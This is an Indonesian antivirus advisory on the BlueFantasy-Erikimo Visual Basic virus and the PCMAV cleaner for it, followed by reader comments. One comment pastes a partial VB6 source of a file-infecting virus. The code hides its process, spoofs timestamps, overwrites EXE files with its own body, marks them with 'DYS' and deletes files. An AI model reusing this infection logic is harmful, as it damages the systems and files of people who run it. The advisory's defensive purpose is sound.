PCMAV SE for BlueFantasy-Erikimo
BlueFantasy kini mengeluarkan varian terbarunya. PCMAV mengenalnya sebagai BlueFantasy-Erikimo. Pembuat virus lokal ini, yang ber-icon-kan mirip folder, sepertinya memang terus meningkatkan kemampuan programmingnya. Terbukti, dengan banyaknya laporan ke PC Media mengenai pengguna komputer yang telah terinfeksi oleh virus ini. Virus yang dibuat dengan Visual Basic dengan ukuran sebesar 40.960 bytes ini di-compile menggunakan metode P-Code.
Ada yang unik dari virus ini. Seperti yang kita ketahui, program yang dibuat menggunakan Visual Basic 5/6 biasanya membutuhkan sebuah file runtime library yang biasa kita kenal dengan nama MSVBVM50.DLL atau MSVBVM60.DLL. Dan seperti yang kita ketahui juga, cara termudah untuk menghapus virus yang diprogram menggunakan Visual Basic adalah dengan cara me-rename file runtime library tersebut untuk sementara, dengan tujuan agar si virus tidak bisa jalan. Namun, hal tersebut tidak berlaku untuk virus ini. BlueFantasy-Erikimo memiliki file runtime library pribadi miliknya sendiri. File tersebut bernama “Thumbs .db“. File ini sebenarnya adalah file MSVBVM60.DLL asli milik Windows yang telah dimodifikasi oleh si pembuat virus ini. File “Thumbs .db” hadir satu paket bersama sang virus. Artinya, jika file “Thumbs .db” tidak ada, otomatis si virus pun tidak dapat berjalan.
BlueFantasy-Erikimo ini meng-hidden-kan setiap folder yang ia temui, lalu digantikan dengan duplikat dari dirinya sendiri. Sejak RC14, PCMAV baru mengenali satu jenis dari virus ini, namun ini tidak menutup kemungkinan dengan adanya varian lain di luar sana yang belum dilaporkan, mengingat penyebaran dari virus ini cukup luas.
Jika komputer Anda telah terinfeksi oleh virus ini, cukup gunakan PCMAV RC14 yang terdapat di Majalah PC Media 04/2007 atau RC terbaru. Walau begitu, kami juga menyediakan PCMAV Single Edition (SE) – Special Cleaner for BlueFantasy-Erikimo yang dapat Anda gunakan untuk mengatasi virus ini sampai ke akar-akarnya hingga tuntas. Silakan Anda periksa secara menyeluruh komputer Anda, namun sebelumnya jangan lupa untuk mematikan fasilitas System Restore dari Windows.
Jika PCMAV-SE ini tidak dapat mengenali virus BlueFantasy yang menghinggap di komputer Anda, silakan kirimkan contoh virus tersebut kepada kami untuk segera dibuatkan antinya.
ada versi freenya gak..?
thx
say kena virus bernama BlueFantasy-Erikimo.inf tapi saya mau donwload PCMAV Single Edition (SE) – Special Cleaner for BlueFantasy-Erikimo gak bisa dan saya sudah pake pcmav anti-virus1.1 update tidak terdeteksi
gw cuma titip pesen ama yg buat virus, ditunggu yg baru, yg ini mah ‘cemen’ & cari lg CW yg baru jgn cengeng!!!. tapi, nice try!!!!
Gw kena virus ini barusan, keknya varian baru. PCMAV 26 cmn bisa detect aja tp gak bisa clean gmana neh, control panel jd gak bisa d akses, system restore jg gak bs d akes
help dunk
dUw notebOokq kna erikimO jga…
gmna neh.. mnA tUgas skOlah lgy nUmpuk…
help dOnk…
mau share nih…..
gmn nangani virus k6wkwon2.exe
pake apa ya antivirusnya
so untuk virus yg notabene ………/win32…..
apa bisa dibasmi, kalau semua aplikasi (.EXE) dijangkiti. listing yg pernah saya lihat sebagian seperti ini:
Private Declare Function GetCurrentProcessId Lib “kernel32″ () As Long
Private Declare Function RegisterServiceProcess Lib “kernel32″ (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Private Declare Function OpenProcess Lib “kernel32″ (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function GetExitCodeProcess Lib “kernel32″ (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib “kernel32″ (ByVal hObject As Long) As Long
Sub Form_Load()
On Error Resume Next
Dim process As Long
Dim cow12 As String
process = GetCurrentProcessId()
Call RegisterServiceProcess(process, RSP_SIMPLE_SERVICE)
cow12 = “ZVful”
cow1 = cow12 & “sw1Vkhoo”
Call WOLUS
wolu1 = App.EXEName
If Right(App.Path, 1) “\” Then
wolu2 = App.Path & “\”
End If
wolu2 = wolu2 & wolu1 & “.exe”
If UCase(wolu2) = winpath & “\SYSTEM32\SYSTEMROOTS.EXE” Then
WOLU = Command()
For x = 1 To Len(WOLU)
xyz = UCase(Mid(WOLU, x, 1))
rangka = rangka + xyz
If Right(rangka, 5) = “.EXE ” Then
rangka = Left(rangka, Len(rangka) – 1)
WOLUku = Right$(WOLU, Len(WOLU) – x)
GoTo cek
End If
Next x
cek:
If UCase(Mid(rangka, 1, 16)) = UCase(propath) Then
PROSESPF (rangka)
GoTo okee
End If
If UCase(Mid(rangka, 1, 16)) UCase(propath) Then
ff = FreeFile
tgljam1 = FileDateTime(rangka)
For w = 1 To Len(tgljam1)
Scan = Mid(tgljam1, w, 1)
If Scan = ” ” Then
tgl1 = tgl1 + Scan
jam1 = Mid(tgljam1, w + 1, Len(tgljam1) – w)
GoTo stempel
End If
tgl1 = tgl1 + Scan
Next w
End If
stempel:
tgljam0 = Date$
jam0 = Time$
Date = tgl1
Time = jam1
Open rangka For Binary Access Read As ff
Dim sebenarnya As String
sebenarnya = Space(LOF(ff))
Get #ff, 1, sebenarnya
If UCase(Right(sebenarnya, 3)) = “DYS” Then
Call KE_ASLINYA
End If
Close #ff
Open wolu2 For Binary Access Read As #2
Dim bobot As String
bobot = Space(ukuranku)
Get #2, 1, bobot
Close #2
Open rangka For Binary Access Write As ff
Put #ff, 1, bobot
Put #ff, ukuranku, sebenarnya
Put #ff, LOF(ff) + 3, “DYS”
Close #ff
Call KE_ASLINYA
Call LIBAS
End If
JANGKIT
dstnya ….
On Error Resume Next
Kill files
ff = FreeFile
Open wolu2 For Binary Access Read As #ff
Dim kodeku As String
kodeku = Space(ukuranku)
Get #ff, 1, kodeku
Close
Open winpath & files11teksnya For Binary Access Write As #ff
Put #ff, 1, kodeku
Put #ff, LOF(ff) + 3, “DYS”
Close
FileCopy winpath & files11teksnya, winpath & “\system32\SystemRoots.dll”
Call KE_ASLINYA
dstnya…